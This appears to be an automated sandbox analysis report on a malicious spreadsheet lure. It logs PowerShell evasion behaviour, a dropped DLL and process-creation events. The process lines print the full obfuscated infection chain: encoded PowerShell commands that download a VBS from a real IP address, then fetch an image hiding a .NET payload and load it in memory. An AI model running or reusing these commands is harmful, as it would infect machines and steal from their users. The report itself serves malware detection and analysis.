Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: SOA USD67,353.35.xla.xlsx	Stream path 'MBD0067A7CA/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
Source: SOA USD67,353.35.xla.xlsx	Stream path 'Workbook' entropy: 7.99839827593 (max. 8.0)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2489	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7461	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8380	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.dll

Jump to dropped file

Source: C:\Windows\System32\mshta.exe TID: 3936	Thread sleep time: -480000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3080	Thread sleep count: 2489 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3080	Thread sleep count: 7461 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3196	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1072	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 772	Thread sleep time: -600000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: powershell.exe PID: 2668, type: MEMORYSTR

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLl -eX BYPaSS -nop -W 1 -C DeviCecredEnTIalDEPLOYMEnt.Exe ; iNVOke-expRESSiON($(iNvOkE-ExpRESSioN('[SysteM.TEXT.ENcODiNG]'+[cHaR]58+[Char]0x3a+'Utf8.GeTSTriNG([SYsTem.CoNVERT]'+[Char]58+[ChAR]0X3A+'FRombASe64STRIng('+[chAR]0X22+'JEw0ZndkeXlMajAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhRGQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVGSU5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRvUEFva1FsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRFBqS3BBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZ0JoTVZaLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFNFSkFZa3BHLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5eXVaQ0FMWVkpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVSaUlMZk4iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQXogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTDRmd2R5eUxqMDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNDQuMTc1LzczL3NpbXBsZWNvb2tpZWJpc2N1dHdpdGhzd2VldG5lc3Nmb3JlbnRpcmV0aW1lLnRJRiIsIiRlTnY6QVBQREFUQVxzaW1wbGVjb29raWViaXNjdXR3aXRoc3dlZXRuZXNzZm9yZW50aXIudmJTIiwwLDApO3NUQXJULVNsZUVwKDMpO0lOdk9rZS1FWFBSZXNzaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcc2ltcGxlY29va2llYmlzY3V0d2l0aHN3ZWV0bmVzc2ZvcmVudGlyLnZiUyI='+[ChAr]0X22+'))')))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplecookiebiscutwithsweetnessforentir.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5706.tmp" "c:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $claustrophobe = 'JGF1dG9zYXZlID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGNoZW1vdHJvcGlzbSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHF1ZWVmID0gJGNoZW1vdHJvcGlzbS5Eb3dubG9hZERhdGEoJGF1dG9zYXZlKTskcHVua2xpbmcgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcXVlZWYpOyR0dWJlcmN1bG9waG9iaWEgPSAnPDxCQVNFNjRfU1RBUlQ+Pic7JGZlbXRvY291bG9tYiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHVudGhyaWZ0eSA9ICRwdW5rbGluZy5JbmRleE9mKCR0dWJlcmN1bG9waG9iaWEpOyRoYW1tYW0gPSAkcHVua2xpbmcuSW5kZXhPZigkZmVtdG9jb3Vsb21iKTskdW50aHJpZnR5IC1nZSAwIC1hbmQgJGhhbW1hbSAtZ3QgJHVudGhyaWZ0eTskdW50aHJpZnR5ICs9ICR0dWJlcmN1bG9waG9iaWEuTGVuZ3RoOyRwZXRyb2RvbGxhciA9ICRoYW1tYW0gLSAkdW50aHJpZnR5OyRkYXN5YXRpZGFlID0gJHB1bmtsaW5nLlN1YnN0cmluZygkdW50aHJpZnR5LCAkcGV0cm9kb2xsYXIpOyRkaWdpdGFsaXNpbmcgPSAtam9pbiAoJGRhc3lhdGlkYWUuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGRhc3lhdGlkYWUuTGVuZ3RoKV07JHVuaWRlYWxpemVkID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGlnaXRhbGlzaW5nKTskY29tbWVuZGluZyA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJHVuaWRlYWxpemVkKTskamFwb25pY2FzID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JGphcG9uaWNhcy5JbnZva2UoJG51bGwsIEAoJzAvY3VWREUvci9lZS5ldHNhcC8vOnNwdHRoJywgJyRjb25maWRlbnRpYWxpdHknLCAnJGNvbmZpZGVudGlhbGl0eScsICckY29uZmlkZW50aWFsaXR5JywgJ0Nhc1BvbCcsICckY29uZmlkZW50aWFsaXR5JywgJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJyRjb25maWRlbnRpYWxpdHknLCckY29uZmlkZW50aWFsaXR5JywnJGNvbmZpZGVudGlhbGl0eScsJzEnLCckY29uZmlkZW50aWFsaXR5JykpOw==';$uninverted = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($claustrophobe));Invoke-Expression $uninverted	Jump to behavior

Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jew0zndkexlmajagicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnykvszevgsu5jvglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olmrmtcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrvuefva1fslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtrfbqs3bblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbyz0jotvzalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagzfnfskfza3bhleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5exvaq0fmwvkpoycgicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicagikvsaulmzk4iicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bhq2ugicagicagicagicagicagicagicagicagicagicagicagqxogicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktdrmd2r5euxqmdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewny4xnziundqumtc1lzczl3npbxbszwnvb2tpzwjpc2n1dhdpdghzd2vldg5lc3nmb3jlbnrpcmv0aw1llnrjriisiirltny6qvbqrefuqvxzaw1wbgvjb29rawviaxnjdxr3axroc3dlzxruzxnzzm9yzw50axiudmjtiiwwldapo3nuqxjulvnszuvwkdmpo0lodk9rzs1fwfbszxnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2ltcgxly29va2llymlzy3v0d2l0ahn3zwv0bmvzc2zvcmvudglylnziuyi='+[char]0x22+'))')))"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jew0zndkexlmajagicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnykvszevgsu5jvglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olmrmtcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrvuefva1fslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtrfbqs3bblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbyz0jotvzalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagzfnfskfza3bhleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5exvaq0fmwvkpoycgicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicagikvsaulmzk4iicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bhq2ugicagicagicagicagicagicagicagicagicagicagicagqxogicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktdrmd2r5euxqmdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewny4xnziundqumtc1lzczl3npbxbszwnvb2tpzwjpc2n1dhdpdghzd2vldg5lc3nmb3jlbnrpcmv0aw1llnrjriisiirltny6qvbqrefuqvxzaw1wbgvjb29rawviaxnjdxr3axroc3dlzxruzxnzzm9yzw50axiudmjtiiwwldapo3nuqxjulvnszuvwkdmpo0lodk9rzs1fwfbszxnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2ltcgxly29va2llymlzy3v0d2l0ahn3zwv0bmvzc2zvcmvudglylnziuyi='+[char]0x22+'))')))"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $claustrophobe = 'jgf1dg9zyxzlid0gj2h0dhbzoi8vcmvzlmnsb3vkaw5hcnkuy29tl2r5dgzsddyxbi9pbwfnzs91cgxvywqvdje3mzmxmzq5ndcvymtschlzzxlldxq0aw1wdzuwbjeuanbnicc7jgnozw1vdhjvcglzbsa9ie5ldy1pymply3qgu3lzdgvtlk5ldc5xzwjdbgllbnq7jhf1zwvmid0gjgnozw1vdhjvcglzbs5eb3dubg9hzerhdgeojgf1dg9zyxzlktskchvua2xpbmcgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzygkcxvlzwypoyr0dwjlcmn1bg9wag9iawegpsanpdxcqvnfnjrfu1rbulq+pic7jgzlbxrvy291bg9tyia9icc8pejbu0u2nf9ftkq+pic7jhvudghyawz0esa9icrwdw5rbgluzy5jbmrlee9mkcr0dwjlcmn1bg9wag9iawepoyroyw1tyw0gpsakchvua2xpbmcusw5kzxhpzigkzmvtdg9jb3vsb21iktskdw50ahjpznr5ic1nzsawic1hbmqgjghhbw1hbsatz3qgjhvudghyawz0etskdw50ahjpznr5ics9icr0dwjlcmn1bg9wag9iaweutgvuz3rooyrwzxryb2rvbgxhcia9icroyw1tyw0glsakdw50ahjpznr5oyrkyxn5yxrpzgflid0gjhb1bmtsaw5nlln1ynn0cmluzygkdw50ahjpznr5lcakcgv0cm9kb2xsyxipoyrkawdpdgfsaxnpbmcgpsatam9pbiaojgrhc3lhdglkywuuvg9dagfyqxjyyxkoksb8iezvckvhy2gtt2jqzwn0ihsgjf8gfslblteuli0ojgrhc3lhdglkywuutgvuz3rokv07jhvuawrlywxpemvkid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhc2u2nfn0cmluzygkzglnaxrhbglzaw5nktsky29tbwvuzgluzya9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev06okxvywqojhvuawrlywxpemvkktskamfwb25py2fzid0gw2rubglilklplkhvbwvdlkdlde1ldghvzcgnvkfjjyk7jgphcg9uawnhcy5jbnzva2uojg51bgwsieaojzavy3vwreuvci9lzs5ldhnhcc8vonnwdhrojywgjyrjb25mawrlbnrpywxpdhknlcanjgnvbmzpzgvudglhbgl0escsiccky29uzmlkzw50awfsaxr5jywgj0nhc1bvbccsiccky29uzmlkzw50awfsaxr5jywgjyrjb25mawrlbnrpywxpdhknlccky29uzmlkzw50awfsaxr5jywnjgnvbmzpzgvudglhbgl0escsjyrjb25mawrlbnrpywxpdhknlccky29uzmlkzw50awfsaxr5jywnjgnvbmzpzgvudglhbgl0escsjzenlccky29uzmlkzw50awfsaxr5jykpow==';$uninverted = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($claustrophobe));invoke-expression $uninverted
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" "/c powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jew0zndkexlmajagicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnykvszevgsu5jvglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olmrmtcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrvuefva1fslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtrfbqs3bblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbyz0jotvzalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagzfnfskfza3bhleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5exvaq0fmwvkpoycgicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicagikvsaulmzk4iicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bhq2ugicagicagicagicagicagicagicagicagicagicagicagqxogicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktdrmd2r5euxqmdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewny4xnziundqumtc1lzczl3npbxbszwnvb2tpzwjpc2n1dhdpdghzd2vldg5lc3nmb3jlbnrpcmv0aw1llnrjriisiirltny6qvbqrefuqvxzaw1wbgvjb29rawviaxnjdxr3axroc3dlzxruzxnzzm9yzw50axiudmjtiiwwldapo3nuqxjulvnszuvwkdmpo0lodk9rzs1fwfbszxnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2ltcgxly29va2llymlzy3v0d2l0ahn3zwv0bmvzc2zvcmvudglylnziuyi='+[char]0x22+'))')))"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; invoke-expression($(invoke-expression('[system.text.encoding]'+[char]58+[char]0x3a+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]0x22+'jew0zndkexlmajagicagicagicagicagicagicagicagicagicagicagicagpsagicagicagicagicagicagicagicagicagicagicagicbhrgqtvhlwzsagicagicagicagicagicagicagicagicagicagicagicattuvnykvszevgsu5jvglpbiagicagicagicagicagicagicagicagicagicagicagicanw0rsbeltcg9ydcgivvjstu9olmrmtcisicagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicagwfrvuefva1fslhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbtrfbqs3bblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagicbyz0jotvzalhvpbnqgicagicagicagicagicagicagicagicagicagicagicagzfnfskfza3bhleludfb0ciagicagicagicagicagicagicagicagicagicagicagicb5exvaq0fmwvkpoycgicagicagicagicagicagicagicagicagicagicagicaglw5htwugicagicagicagicagicagicagicagicagicagicagicagikvsaulmzk4iicagicagicagicagicagicagicagicagicagicagicagic1uqu1lc1bhq2ugicagicagicagicagicagicagicagicagicagicagicagqxogicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicaktdrmd2r5euxqmdo6vvjmrg93bmxvywrub0zpbguomcwiahr0cdovlzewny4xnziundqumtc1lzczl3npbxbszwnvb2tpzwjpc2n1dhdpdghzd2vldg5lc3nmb3jlbnrpcmv0aw1llnrjriisiirltny6qvbqrefuqvxzaw1wbgvjb29rawviaxnjdxr3axroc3dlzxruzxnzzm9yzw50axiudmjtiiwwldapo3nuqxjulvnszuvwkdmpo0lodk9rzs1fwfbszxnzaw9oicagicagicagicagicagicagicagicagicagicagicagicikzu5wokfquerbvefcc2ltcgxly29va2llymlzy3v0d2l0ahn3zwv0bmvzc2zvcmvudglylnziuyi='+[char]0x22+'))')))"	Jump to behavior
